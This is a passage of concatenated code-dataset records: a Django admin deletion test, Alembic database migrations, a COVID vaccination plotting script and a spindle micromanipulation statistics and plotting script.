)\n\n def test_delete_selected_check_cannot_delete_public(self):\n # delete won't work (via admin) for public instances\n request = None\n self.assertRaises(PermissionDenied, delete_selected, self.page_admin,\n request, FlatPage.objects.published())\n\n def test_delete_selected(self):\n class dummy_request(object):\n POST = {}\n META = {}\n\n class user(object):\n @classmethod\n def has_perm(cls, *arg):\n return True\n\n @classmethod\n def get_and_delete_messages(cls):\n return []\n\n response = delete_selected(self.page_admin, dummy_request,\n FlatPage.objects.draft())\n self.failUnless(response is not None)\n", "sub_path": "publish/tests/test_delete_selected.py", "file_name": "test_delete_selected.py", "file_ext": "py", "file_size_in_byte": 1872, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.create", "line_number": 14, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 14, "usage_type": "name"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.create", "line_number": 15, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 15, "usage_type": "name"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.create", "line_number": 16, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 16, "usage_type": "name"}, {"api_name": "django.contrib.admin.AdminSite", "line_number": 22, "usage_type": "call"}, {"api_name": "publish.admin.PublishableAdmin", "line_number": 23, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.settings.ROOT_URLCONF", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 26, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 29, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 35, "usage_type": "argument"}, {"api_name": "publish.actions.delete_selected", "line_number": 35, "usage_type": "argument"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.published", "line_number": 36, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 36, "usage_type": "name"}, {"api_name": "publish.actions.delete_selected", "line_number": 52, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.draft", "line_number": 53, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "641785692", "text": "\"\"\"empty message\n\nRevision ID: c4fb1193c906\nRevises: 0492ec975f7c\nCreate Date: 2018-01-04 11:08:03.480491\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c4fb1193c906'\ndown_revision = '0492ec975f7c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('categories_categ_name_key', 'categories', type_='unique')\n op.drop_constraint('recipes_recipe_name_key', 'recipes', type_='unique')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint('recipes_recipe_name_key', 'recipes', ['recipe_name'])\n op.create_unique_constraint('categories_categ_name_key', 'categories', ['categ_name'])\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/c4fb1193c906_.py", "file_name": "c4fb1193c906_.py", "file_ext": "py", "file_size_in_byte": 872, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "alembic.op.drop_constraint", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "364970921", "text": "import sys\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport pandasql as ps\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef main():\r\n script = sys.argv[0]\r\n locations = sys.argv[1:]\r\n df_loaction = pd.DataFrame(locations)\r\n df_loaction.rename(columns={0:'loaction'},inplace=True)\r\n df=pd.read_csv('covid-locations.csv')\r\n list1=[]\r\n list2=[]\r\n df_list = df['location'].tolist()\r\n if sys.argv == ['week3.py']:\r\n print('Error: No Locations were specified. Cannot proceed.')\r\n print('Please specify locations like so:')\r\n print(\"python3 week3.py 'Australia' 'Brazil' 'New Zealand'\")\r\n else :\r\n for location in locations:\r\n if location in df_list:\r\n list1.append(location)\r\n else :\r\n list2.append(location)\r\n \r\n if len(list2) == 0:\r\n print('Generating visualisation for' + str(list1))\r\n df_covid_data = pd.read_csv('owid-covid-data.csv')\r\n df_select= ps.sqldf(\r\n\t \"SELECT c.location, c.people_fully_vaccinated_per_hundred, c.date \"\r\n\t + \" FROM df_covid_data as c inner join df_loaction as l\"\r\n + \" on c.location = l.loaction \"\r\n )\r\n\r\n df_select = df_select.dropna(subset = ['people_fully_vaccinated_per_hundred'])\r\n df_select['date'] = pd.to_datetime(df_select['date'])\r\n fig = plt.figure(figsize=(12, 8))\r\n ax = fig.add_subplot(1,1,1)\r\n sb_lineplot = sns.lineplot(x='date', y='people_fully_vaccinated_per_hundred', hue='location', markers=True, data=df_select)\r\n ax.set_title(\"COVID-19 people FULLY vaccinated per hundred: Wallia and Japan/Liechtenstein/Greece/Monaco/Hungary\")\r\n plt.xticks(rotation=20)\r\n plt.savefig('001.png')\r\n #df_select.to_csv(\"chartdata.csv\")\r\n #print('----Done')\r\n \r\n else:\r\n print('Error: Locations' + str(list2) + ' are not found in dataset. Cannot proceed.')\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "week3.py", "file_name": "week3.py", "file_ext": "py", "file_size_in_byte": 2085, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandasql.sqldf", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "553625680", "text": "\n# This script reads in a pickled dictionary containing the data from each experiment\n# Specify the path for where this dictionary is and an output path for where plots should save\n\n# This runs stats on measurements across different cells\n\n\n# first import whatever you need\nimport sys\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport scipy\nimport pandas as pd\nimport math\n#import seaborn as sns\nfrom scipy.stats import ttest_rel,wilcoxon,spearmanr\n\n#plt.style.use('seaborn-whitegrid')\n\nimport pickle\n\n# clear any plots\n\nplt.clf()\n\n# set up your paths\n\ndatapath = \"/Users/alexandralong/Documents/UCSF/Dumont Lab/Analysis/Micromanipulation/MtrackJ_testing/plots/alldata.p\"\noutputpath = \"/Users/alexandralong/Documents/UCSF/Dumont Lab/Analysis/Micromanipulation/MtrackJ_testing/plots\"\n\n# load pickled data \n# this was created from makeMasterStructure.py and stored dict of all experiment dicts\nalldata = pickle.load( open(datapath, \"rb\" ) )\n\n# initialize the key variables and figures you want to make\nfig1, ax1= plt.subplots(2,2)\nfig2, ax2 = plt.subplots(2,2)\nfig3,ax3 = plt.subplots(2,2)\nfig5,ax5 = plt.subplots(1)\nfig6,ax6 = plt.subplots(1)\n#fig2.set_size_inches(2, 6)\n\nK1K2start = []\nK1K2end = []\nK3K4start = []\nK3K4end = []\npole1= []\npole2 = []\nKT1Pole1start = []\nKT2Pole2start = []\nKT3Pole1start = []\nKT4Pole2start = []\nKT1Pole1end = []\nKT2Pole2end = []\nKT3Pole1end = []\nKT4Pole2end = []\nspindlelengthstart = []\nspindlelengthend = []\nspindlewidthstart = []\nspindlewidthend = []\narc12start = []\narc12end = []\narc34start = []\narc34end = []\nKfib1vel = []\nKfib2vel = []\nKfib3vel = []\nKfib4vel = []\nneedlediam = []\nneedletotaltime = []\nneedletotaldist = []\nnamelist = []\nK1K2deltanorm = []\nneedletoKT1dist = []\n\n# loop through each cell and build a list \nfor exp in alldata:\n\n\texpname = alldata[exp]['Name']\n\tnamelist.append(expname)\n\n\tK1K2start.append(alldata[exp]['KT12_duringmanip'][3])\n\tK1K2end.append(alldata[exp]['KT12_duringmanip'][0])\n\tK3K4start.append(alldata[exp]['KT34_duringmanip'][3])\n\tK3K4end.append(alldata[exp]['KT34_duringmanip'][0])\n\tKT1Pole1start.append(alldata[exp]['KT1toPole1_duringmanip'][0])\n\tKT2Pole2start.append(alldata[exp]['KT2toPole2_duringmanip'][0])\n\tKT3Pole1start.append(alldata[exp]['KT3toPole1_duringmanip'][0])\n\tKT4Pole2start.append(alldata[exp]['KT4toPole2_duringmanip'][0])\n\n\tK1K2deltanorm.append((alldata[exp]['KT12_duringmanip'][0]-alldata[exp]['KT12_duringmanip'][3])/alldata[exp]['KT12_duringmanip'][3])\n\n\tneedletoKT1dist.append(alldata[exp]['NeedleToKT1'][0])\n\n\t#KT1Pole1end.append(alldata[exp]['KT1toPole1_duringmanip'][-1])\n\tKT2Pole2end.append(alldata[exp]['KT2toPole2_duringmanip'][-1])\n\tKT3Pole1end.append(alldata[exp]['KT3toPole1_duringmanip'][-1])\n\tKT4Pole2end.append(alldata[exp]['KT4toPole2_duringmanip'][-1])\n\tspindlelengthstart.append(alldata[exp]['SpindleLength'][0])\n\tspindlelengthend.append(alldata[exp]['SpindleLength'][1])\n\tspindlewidthstart.append(alldata[exp]['SpindleWidth'][0])\n\tspindlewidthend.append(alldata[exp]['SpindleWidth'][1])\n\n\tpole1.append(alldata[exp]['Pole1_duringmanip'])\n\tpole2.append(alldata[exp]['Pole2_duringmanip'])\n\n\tneedlediam.append(alldata[exp]['NeedleDiam'])\n\tendpoint = alldata[exp]['NeedleIndexEnd']\n\tneedletotaltime.append(alldata[exp]['NeedleTime'][endpoint] - alldata[exp]['NeedleTime'][0])\n\tneedletotaldist.append(alldata[exp]['NeedlePos'][endpoint]-alldata[exp]['NeedlePos'][0])\n\n\tKfib1vel.append(alldata[exp]['KT1toPole1Fit'][0]*60)\n\tKfib2vel.append(alldata[exp]['KT2toPole2Fit'][0]*60)\n\tKfib3vel.append(alldata[exp]['KT3toPole1Fit'][0]*60)\n\tKfib4vel.append(alldata[exp]['KT4toPole2Fit'][0]*60)\n\n\t# this is summing the distance along a k-fiber pair from pole to pole (diff way to quantify geometry changes)\n\tarc12start.append(alldata[exp]['KT1toPole1_duringmanip'][0]+alldata[exp]['KT12_duringmanip'][3]+alldata[exp]['KT2toPole2_duringmanip'][0])\n\t#arc12end.append(alldata[exp]['KT1toPole1_duringmanip'][-1]+alldata[exp]['KT12_duringmanip'][0]+alldata[exp]['KT3toPole1_duringmanip'][-1])\n\tarc34start.append(alldata[exp]['KT3toPole1_duringmanip'][0]+alldata[exp]['KT34_duringmanip'][3]+alldata[exp]['KT4toPole2_duringmanip'][0])\n\tarc34end.append(alldata[exp]['KT3toPole1_duringmanip'][-1]+alldata[exp]['KT34_duringmanip'][0]+alldata[exp]['KT4toPole2_duringmanip'][-1])\n\n\t# or try calculating the arc using the needle position (to better estimate k-fiber 1)\n\t#arc12start.append(alldata[exp]['NeedleToKT1'][0]+alldata[exp]['NeedleToPole1'][0]+alldata[exp]['KT12_duringmanip'][3]+alldata[exp]['KT2toPole2_duringmanip'][0])\n\tarc12end.append(alldata[exp]['NeedleToKT1'][1]+alldata[exp]['NeedleToPole1'][1]+alldata[exp]['KT12_duringmanip'][0]+alldata[exp]['KT3toPole1_duringmanip'][-1])\n\t#KT1Pole1start.append(alldata[exp]['NeedleToKT1'][0]+alldata[exp]['NeedleToPole1'][0])\n\tKT1Pole1end.append(alldata[exp]['NeedleToKT1'][1]+alldata[exp]['NeedleToPole1'][1])\n\n\t#print(alldata[exp]['NeedleToKT1'][0]) \n\t#print(alldata[exp]['NeedleToPole1'][0])\n\t#print(alldata[exp]['KT1toPole1_duringmanip'][0])\n\t#print(alldata[exp]['NeedleToKT1'][1] + alldata[exp]['NeedleToPole1'][1])\n\t#print(alldata[exp]['KT1toPole1_duringmanip'][-1])\n## Now outside of the loop, save all the figures\n## make sure that the formatting includes the legend so it's not cropped out \n\n\n\n# compute a paired statistical test (since the measurements pre post should be paired by cell)\n\ndeltaK1K2results = scipy.stats.wilcoxon(K1K2start,K1K2end)\ndeltaK3K4results = scipy.stats.wilcoxon(K3K4start,K3K4end)\n\ndeltaKfib1results = scipy.stats.wilcoxon(KT1Pole1start,KT1Pole1end)\ndeltaKfib2results = scipy.stats.wilcoxon(KT2Pole2start,KT2Pole2end)\ndeltaKfib3results = scipy.stats.wilcoxon(KT3Pole1start,KT3Pole1end)\ndeltaKfib4results = scipy.stats.wilcoxon(KT4Pole2start,KT4Pole2end)\n\ndeltaSpindleLength = scipy.stats.wilcoxon(spindlelengthstart,spindlelengthend)\ndeltaSpindleWidth = scipy.stats.wilcoxon(spindlewidthstart,spindlewidthend)\n\ndeltaArc12 = scipy.stats.wilcoxon(arc12start,arc12end)\ndeltaArc34 = scipy.stats.wilcoxon(arc34start,arc34end)\n\nperim_start = np.add(arc12start,arc34start)\nperim_end = np.add(arc12end,arc34end)\nperim = scipy.stats.wilcoxon(perim_start,perim_end)\n\ndeltaKfib1 = np.subtract(KT1Pole1end,KT1Pole1start)\ndeltaK1K2 = np.subtract(K1K2end,K1K2start)/K1K2start\ndeltaK3K4 = np.subtract(K3K4end,K3K4start)/K3K4start\ndeltaKfib2 = np.subtract(KT2Pole2end,KT2Pole2start)\ndeltaKfib3 = np.subtract(KT3Pole1end,KT3Pole1start)\ndeltaKfib4 = np.subtract(KT4Pole2end,KT4Pole2start)\ndeltaperim = np.subtract(perim_end,perim_start)\n\n\nprint('deltaK1K2results=',deltaK1K2results)\nprint('deltaK3K4results=',deltaK3K4results)\nprint('deltaKfib1results=',deltaKfib1results)\nprint('deltaKfib2results=',deltaKfib2results)\nprint('deltaKfib3results=',deltaKfib3results)\nprint('deltaKfib4results=',deltaKfib4results)\nprint('delta spindle length=',deltaSpindleLength)\nprint('delta spindle width=',deltaSpindleWidth)\nprint('delta arc12=',deltaArc12)\nprint('delta arc34=',deltaArc34)\nprint('perimeter = ',perim)\n\n\nprint('avg spindle length at start %.2f +/- %.2f' %(np.mean(spindlelengthstart),np.std(spindlelengthstart)/np.sqrt(len(spindlelengthstart))))\nprint('avg spindle length at end %.2f +/- %.2f' %(np.mean(spindlelengthend),np.std(spindlelengthend)/np.sqrt(len(spindlelengthend))))\n\nprint('avg spindle width at start %.2f +/- %.2f' %(np.mean(spindlewidthstart),np.std(spindlewidthstart)/np.sqrt(len(spindlewidthstart))))\nprint('avg spindle width at end %.2f +/- %.2f' %(np.mean(spindlewidthend),np.std(spindlewidthend)/np.sqrt(len(spindlewidthend))))\n\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib1))\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib2))\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib3))\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib4))\n\nprint('******')\n#print(np.corrcoef(deltaKfib1,deltaK3K4))\n#print(np.corrcoef(deltaKfib2,deltaK3K4))\n#print(np.corrcoef(deltaKfib3,deltaK3K4))\n#print(np.corrcoef(deltaKfib4,deltaK3K4))\nprint(scipy.stats.spearmanr(pole1,deltaKfib1))\nprint(scipy.stats.spearmanr(pole1,deltaKfib2))\nprint(scipy.stats.spearmanr(pole1,deltaKfib3))\nprint(scipy.stats.spearmanr(pole1,deltaKfib4))\nprint('******')\n\n#print(np.corrcoef(deltaKfib1,pole2))\n#print(np.corrcoef(deltaKfib2,pole2))\n#print(np.corrcoef(deltaKfib3,pole2))\n#print(np.corrcoef(deltaKfib4,pole2))\n\nprint(scipy.stats.spearmanr(pole1,deltaK1K2))\nprint(scipy.stats.spearmanr(pole2,deltaK1K2))\n\nprint(scipy.stats.spearmanr(pole1,needletoKT1dist))\n\n\n# top left - interkinetochore distances\n#sns.boxplot(data = [K1K2start,K1K2end,K3K4start,K3K4end], ax=ax1)\n#sns.swarmplot(data = [K1K2start,K1K2end,K3K4start,K3K4end],ax=ax1)\nax1[0,0].boxplot([K1K2start,K1K2end,K3K4start,K3K4end],0,labels = ['K1K2 pre','K1K2 post','K3K4 pre','K3K4 post'],showmeans=True)\n\nax1[0,0].set_ylabel('Interkinetochore distance (\\u03bcm)')\nax1[0,0].set_xticklabels(ax1[0,0].get_xticklabels(),rotation=90)\n\n# top right - approximation of k-fiber length\nax1[0,1].boxplot([KT1Pole1start,KT1Pole1end,KT2Pole2start,KT2Pole2end,KT3Pole1start,KT3Pole1end,KT4Pole2start,KT4Pole2end],0,labels = ['Kfib1 pre','Kfib1 post','Kfib2 pre', 'Kfib2 post','Kfib3 pre','Kfib3 post','Kfib4 pre','Kfib4 post'],showmeans=True)\nax1[0,1].set_xticklabels(ax1[0,1].get_xticklabels(),rotation=90)\nax1[0,1].set_ylabel('Crude k-fiber length (\\u03bcm)')\n\n# bottom left spindle length and width\nax1[1,0].boxplot([spindlelengthstart,spindlelengthend,spindlewidthstart,spindlewidthend],0,labels = ['Length pre','Length post','Width pre','Width post'],showmeans=True)\nax1[1,0].set_xticklabels(ax1[1,0].get_xticklabels(),rotation=90)\nax1[1,0].set_ylabel('Spindle Dimensions (\\u03bcm)')\n\n# bottom right (perimeter)\nax1[1,1].boxplot([arc12start,arc12end,arc34start,arc34end,np.add(arc12start,arc34start),np.add(arc12end,arc34end)],0,labels = ['Arc12 pre','Arc12 post','Arc34 pre','Arc34 post','Perim start','Perim end'],showmeans=True)\nax1[1,1].set_xticklabels(ax1[1,1].get_xticklabels(),rotation=90)\nax1[1,1].set_ylabel('Arc length (\\u03bcm)')\n\nax5.scatter(pole1,K1K2deltanorm,color = 'k')\nax5.set_xlabel('Pole1 total dist (\\u03bcm)',fontsize = 25)\nax5.set_ylabel('Normalized Delta K1-K2 ',fontsize = 25)\nax5.set_xlim(0,8.5)\nlinfit2 = np.polyfit(pole1, K1K2deltanorm, 1)\nval2 = np.polyval(linfit2,pole1)\nax5.plot(pole1,val2)\nfig5.savefig('%s/KKdeltanormvspolescatter.eps'%outputpath,dpi=300)\n\n\nax6.scatter(pole1,needletoKT1dist,color = 'k')\nax6.set_xlabel('Pole1 total dist (\\u03bcm)',fontsize = 25)\nax6.set_ylabel('needle center to KT1 (\\u03bcm)',fontsize = 25)\nax6.set_xlim(0,8.5)\nlinfit1 = np.polyfit(pole1, needletoKT1dist, 1)\nval = np.polyval(linfit1,pole1)\nax6.plot(pole1,val)\nfig6.savefig('%s/needledistvspolescatter.eps'%outputpath,dpi=300)\n\n\n#popt, pcov = curve_fit(gauss_function,xdata,ydata,[10,1,1])\n\n# bottom right (perimeter)\n#numSamples = len(arc12start)\n#x = np.ones(numSamples)\n\n#ax3[0].scatter(x,arc12start)\n#ax3[0].scatter(x*2,arc12end)\n#ax3[0].scatter(x*3,arc34start)\n#ax3[0].scatter(x*4,arc34end)\n#ax3[0].scatter(x*5,np.add(arc12start,arc34start))\n#ax3[0].scatter(x*6,np.add(arc12end,arc34end))\n\n# what predicts whether a cell will change perimeter or not?\n#ax3[0,0].scatter(deltaK1K2,deltaperim)\n#ax3[0,0].set_xlabel('Delta K1K2 (\\u03bcm)')\n#ax3[0,0].set_ylabel('Delta perimeter (\\u03bcm)')\n\n#ax3[0,1].scatter(needlediam,deltaperim)\n#ax3[0,1].set_xlabel('Needle Diam (s)')\n#ax3[0,1].set_ylabel('Delta perimeter (\\u03bcm)')\n\n#ax3[1,0].scatter(needletotaltime,deltaperim, label = namelist)\n#ax3[1,0].set_xlabel('Needle Total Time (s)')\n#ax3[1,0].set_ylabel('Delta perimeter (\\u03bcm)')\n\n#ax3[1,1].scatter(needletotaldist,deltaperim)\n#ax3[1,1].set_xlabel('Needle Total Dist (\\u03bcm)')\n#ax3[1,1].set_ylabel('Delta perimeter (\\u03bcm)')\n\n\nax2[0,0].hist(needlediam)\nax2[0,0].set_ylabel('Count')\nax2[0,0].set_xlabel('Needle diameter (\\u03bcm)')\n\nax2[0,1].hist(needletotaltime)\nax2[0,1].set_ylabel('Count')\nax2[0,1].set_xlabel('Needle Total Time (s)')\n\nax2[1,0].hist(needletotaldist)\nax2[1,0].set_ylabel('Count')\nax2[1,0].set_xlabel('Needle Total Dist (\\u03bcm)')\n#ax2[2].set_xlim(0,12)\n\nax2[1,1].hist(np.divide(needletotaldist,needletotaltime)*60)\nax2[1,1].set_ylabel('Count')\nax2[1,1].set_xlabel('Needle Velocity (\\u03bcm/min)')\n\n\n# save the figure\nfig1.tight_layout()\nfig1.savefig('%s/manipboxplots.eps'%outputpath,dpi=300)\n\nfig2.tight_layout()\nfig2.savefig('%s/assay_setup_histograms.eps'%outputpath,dpi=300)\n\n#fig3.tight_layout()\n#fig3.savefig('%s/perim_bycell.tif'%outputpath,dpi=300)\n\n\n\n", "sub_path": "analysis/makePlotsWithStats.py", "file_name": "makePlotsWithStats.py", "file_ext": "py", "file_size_in_byte": 12407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.clf", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 141, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 141, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 142, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 144, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 145, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 146, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 147, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 147, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 149, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 149, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 150, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 150, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 152, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 153, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 156, "usage_type": "call"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 157, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.subtract", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "scipy.stats.spearmanr", "line_number": 187, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 187, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 188, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 189, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 189, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 190, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 190, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 197, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 197, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 198, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 198, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 199, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 199, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 200, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 200, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 208, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 208, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 209, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 209, "usage_type": "attribute"}, {"api_name": "scipy.stats.spearmanr", "line_number": 211, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 211, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 301, "usage_type": "call"}]} +{"seq_id": "531593115", "text": "\"\"\"empty message\n\nRevision ID: 1f249eadb14\nRevises: 27ca60a84b4f\nCreate Date: 2015-11-13 22:09:59.622000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1f249eadb14'\ndown_revision = '27ca60a84b4f'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('answer', sa.Column('remark', sa.Unicode(length=120), nullable=True))\n op.drop_column('answer', 'description')\n op.add_column('question', sa.Column('remark', sa.Unicode(length=120), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('question', 'remark')\n op.add_column('answer', sa.Column('description', mysql.VARCHAR(length=100), nullable=True))\n 